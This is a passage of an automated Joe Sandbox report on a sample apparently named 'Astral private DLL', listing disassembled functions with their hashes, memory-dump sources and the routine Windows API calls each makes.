                                                                • Instruction ID: 0cec639826dc35e991ea1eb6d8ef1c6e3193bbed8e1ed0c620f4f28ae8f8cd3f
                                                                • Opcode Fuzzy Hash: 0d99bbb4db79a6d7b82e31afd80a575a806a5f32734cab14130f14636464651f
                                                                • Instruction Fuzzy Hash: 81318B75C04249AECF15DF68D891AEEBBB4AF18304F54849EE409B7242DB35AF04CB61
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0018ACF8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc
                                                                • String ID:
                                                                • API String ID: 190572456-0
                                                                • Opcode ID: ff97f0f019d2cd7e1842a23919ce3efa4c885250f88d561049a5118e94924a45
                                                                • Instruction ID: d978b812188d6b37f74b92b1ac2596d9d9353419484cca872bac40e2e6a61313
                                                                • Opcode Fuzzy Hash: ff97f0f019d2cd7e1842a23919ce3efa4c885250f88d561049a5118e94924a45
                                                                • Instruction Fuzzy Hash: BD112933A006255FAB26FEA8EC4095A7399EF843607564222FD15EB654D730EE418FD2
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0016CE45
                                                                  • Part of subcall function 00165E37: __EH_prolog.LIBCMT ref: 00165E3C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 86f54067edb6cf3e9aca848a63996c51826d961f9ba03e0abd0d43e9963d66d6
                                                                • Instruction ID: 7cb9a201960042bfa3f9f4a6c05b313dcede62ded8fa0353348a30af03e8143a
                                                                • Opcode Fuzzy Hash: 86f54067edb6cf3e9aca848a63996c51826d961f9ba03e0abd0d43e9963d66d6
                                                                • Instruction Fuzzy Hash: FD118271A00244DEEB14EBB9C946BAEBBF8DF65300F14445EE486E7282DB745F04CB62
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 91d855cc0d606b69d39131acd9bd5a5a2504e9497053fdff13e9575324d842af
                                                                • Instruction ID: b6efa1cc146cb5fc3abc3a31f8d4c5bfb6c59289e0c5413d9ea81139b29a427d
                                                                • Opcode Fuzzy Hash: 91d855cc0d606b69d39131acd9bd5a5a2504e9497053fdff13e9575324d842af
                                                                • Instruction Fuzzy Hash: 5001A533E00528ABCF11ABA8CD919DEB775BF98750F054119F816BB252DB348D24C6A0
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00189813,00000001,00000364,?,00183F73,00000050,?,001A1030,00000200), ref: 0018B177
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: de53dffe25cd04723e94871392ce0520efb7f12979c49f0cd90e6751cfe7f85d
                                                                • Instruction ID: ae48dbd046f23b9eafd3b233e73d331f72943f959da05fc6ba5ffaea99949748
                                                                • Opcode Fuzzy Hash: de53dffe25cd04723e94871392ce0520efb7f12979c49f0cd90e6751cfe7f85d
                                                                • Instruction Fuzzy Hash: 56F0543254D12567DB257A61BCAEBAE7788AB55770B198111FC189F190CB60DB018FE0
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00183C3F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc
                                                                • String ID:
                                                                • API String ID: 190572456-0
                                                                • Opcode ID: e601f1d4601f671d4558ec69dee13edc9f74bf2ade8e9f2e171642574b4db9ea
                                                                • Instruction ID: 8e773ec41a4b65abbe90d7f1cab15c410c134ff98d30907ebd0599363aa04f92
                                                                • Opcode Fuzzy Hash: e601f1d4601f671d4558ec69dee13edc9f74bf2ade8e9f2e171642574b4db9ea
                                                                • Instruction Fuzzy Hash: DEF0E5322002169FCF16AEA8EC0099A77A9FF01F2071C4126FA25E71D0DB31DB20CF90
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018CA2C,00000000,?,00186CBE,?,00000008,?,001891E0,?,?,?), ref: 00188E38
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 0d5438af8da1869d7ae6ece508438036fd889a057605a8f8a0b2407010005ed2
                                                                • Instruction ID: 07cb7770fd142b90448ad6a1d060f880756e9d97ecc239a4f300778227872bc6
                                                                • Opcode Fuzzy Hash: 0d5438af8da1869d7ae6ece508438036fd889a057605a8f8a0b2407010005ed2
                                                                • Instruction Fuzzy Hash: 58E06D312466255BEA7536699C09BAB7A889F517B4F960121BC1897491DF60CF008FF1
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00165AC2
                                                                  • Part of subcall function 0016B505: __EH_prolog.LIBCMT ref: 0016B50A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 24ba546376b03365c5f701a3a680142f99767a207e6265c514e106c346dc39f8
                                                                • Instruction ID: 9c3e2effb5d0454326f07f77b4179518625077223d9aa0be1e3a5921388d88f7
                                                                • Opcode Fuzzy Hash: 24ba546376b03365c5f701a3a680142f99767a207e6265c514e106c346dc39f8
                                                                • Instruction Fuzzy Hash: 10018C30810790DAD726E7B8C0617EDFBF49F79304F54848EA45A63282CBB41B08D7A2
                                                                APIs
                                                                  • Part of subcall function 0016A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6C4
                                                                  • Part of subcall function 0016A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6F2
                                                                  • Part of subcall function 0016A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0016A592,000000FF,?,?), ref: 0016A6FE
                                                                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0016A598
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                • String ID:
                                                                • API String ID: 1464966427-0
                                                                • Opcode ID: 2ca7ef2919bb179c1bb88ac16be5a9c32058bbe62678bc7da7fd1d8cdf979f11
                                                                • Instruction ID: dcaaa203d26c0a0733bfe11c7e95214f5b5084226258030d0b7204602a0eb94a
                                                                • Opcode Fuzzy Hash: 2ca7ef2919bb179c1bb88ac16be5a9c32058bbe62678bc7da7fd1d8cdf979f11
                                                                • Instruction Fuzzy Hash: 01F08231008790AACB22A7B48D04BCB7B906F2A331F448B4DF5FE62196C37550B89F23
                                                                APIs
                                                                • SetThreadExecutionState.KERNEL32(00000001), ref: 00170E3D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ExecutionStateThread
                                                                • String ID:
                                                                • API String ID: 2211380416-0
                                                                • Opcode ID: 92fe46098c5a40ad61953fc8928d4e8ba29ff47137f817b504c567dbf2b50069
                                                                • Instruction ID: 893d561417778c5150fcd552c6a137ba720ff65debd031814ded8d9e37de830c
                                                                • Opcode Fuzzy Hash: 92fe46098c5a40ad61953fc8928d4e8ba29ff47137f817b504c567dbf2b50069
                                                                • Instruction Fuzzy Hash: DBD02B116011547ADB12332C2D157FF36268FEB310F0C4026F04D67583CF4448C2A261
                                                                APIs
                                                                • GdipAlloc.GDIPLUS(00000010), ref: 0017A62C
                                                                  • Part of subcall function 0017A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0017A3DA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Gdip$AllocBitmapCreateFromStream
                                                                • String ID:
                                                                • API String ID: 1915507550-0
                                                                • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                • Instruction ID: 85344529e0f8cf24be0ae17322744c586a6f6e8416d89b9aac4e60762e03c764
                                                                • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                • Instruction Fuzzy Hash: 25D0C971210209BADF466F618C1296E7AFAEF90340F44C125B84AD6191EBB1DA10A662
                                                                APIs
                                                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00171B3E), ref: 0017DD92
                                                                  • Part of subcall function 0017B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017B579
                                                                  • Part of subcall function 0017B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017B58A
                                                                  • Part of subcall function 0017B568: IsDialogMessageW.USER32(0001043C,?), ref: 0017B59E
                                                                  • Part of subcall function 0017B568: TranslateMessage.USER32(?), ref: 0017B5AC
                                                                  • Part of subcall function 0017B568: DispatchMessageW.USER32(?), ref: 0017B5B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                • String ID:
                                                                • API String ID: 897784432-0
                                                                • Opcode ID: dda07b3ed83e17f2b361ea4901f78009409e4891d1267d275f3207c8e9bab02b
                                                                • Instruction ID: c2a6131d3664bfe06526d759309eee2c1b089c9387470d0b0672920e803af532
                                                                • Opcode Fuzzy Hash: dda07b3ed83e17f2b361ea4901f78009409e4891d1267d275f3207c8e9bab02b
                                                                • Instruction Fuzzy Hash: DED09E32148300BAD6022B51DD06F0A7AB2AB9CB08F008554B288744B187729D71EB11
                                                                APIs
                                                                • DloadProtectSection.DELAYIMP ref: 0017E5E3
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: DloadProtectSection
                                                                • String ID:
                                                                • API String ID: 2203082970-0
                                                                • Opcode ID: 3ac91f4eef78a3c9904fa0701581ef07127fadbccedbd4bc1432f740203b936e
                                                                • Instruction ID: 01ae2a12fea854fb09e20196cc9d26f04aabe3fe0bb59fd5b4696a8a836b12c0
                                                                • Opcode Fuzzy Hash: 3ac91f4eef78a3c9904fa0701581ef07127fadbccedbd4bc1432f740203b936e
                                                                • Instruction Fuzzy Hash: 9DD0C9B41C0280AAD706EBA89886B1836F5BB3E704F94C185B14D998A2DB6484D1CB0A
                                                                APIs
                                                                • GetFileType.KERNELBASE(000000FF,001697BE), ref: 001698C8
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID:
                                                                • API String ID: 3081899298-0
                                                                • Opcode ID: da79bd8a5708a501640c349eb776e485b7842a481bcf9e5609143c19fe8cf5b9
                                                                • Instruction ID: 8f56b73962e5b06c6d1c78458c43023b342f18fa8140d497c598e10f4189d163
                                                                • Opcode Fuzzy Hash: da79bd8a5708a501640c349eb776e485b7842a481bcf9e5609143c19fe8cf5b9
                                                                • Instruction Fuzzy Hash: 54C00239404249D78E219B249C4909A772AAB533A67B8A695D069CA4A1C336CCABEA11
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 1dcfdfe1348e501d9756830aa033874d39ea644a9daabdc8281c70f43cf55b79
                                                                • Instruction ID: afd38c8453e071b63f89f25ddf0176a8487f22c58d7ea8caa0e3869e57a49cb7
                                                                • Opcode Fuzzy Hash: 1dcfdfe1348e501d9756830aa033874d39ea644a9daabdc8281c70f43cf55b79
                                                                • Instruction Fuzzy Hash: 1CB09295258100BC7208A1451902D3701ACC099B10331C46EB829D04809A40AC401872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 5c5947f81f704713fec4fb389692186fba34ca9b38a1cf900e6ad96bf96741bb
                                                                • Instruction ID: 70421502e88112a3f10f839c07121b746f3468775eaae8b919ed29ddac3f716d
                                                                • Opcode Fuzzy Hash: 5c5947f81f704713fec4fb389692186fba34ca9b38a1cf900e6ad96bf96741bb
                                                                • Instruction Fuzzy Hash: D6B09291258000BC7208A2051902E3601ECC099B10335C06EB829C11809A40A8440872
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 28d91c7657979b98dd36749562a65f6f900bac90a9f29572680e9777bbcdf304
                                                                • Instruction ID: d7fa0c0f0bd64a1671903b31da9cccbfbe6bb69c681dd27a13e32c69c92b5db4
                                                                • Opcode Fuzzy Hash: 28d91c7657979b98dd36749562a65f6f900bac90a9f29572680e9777bbcdf304
                                                                • Instruction Fuzzy Hash: 3CB092D5258100BC7208A1491902E3701ECC098B10331C06EB829C10809A40AC401972
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E1E3
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 968f8f6a35828559ca2a58e4e55f11a01c5382974b5e87474b2127d3be036e2f
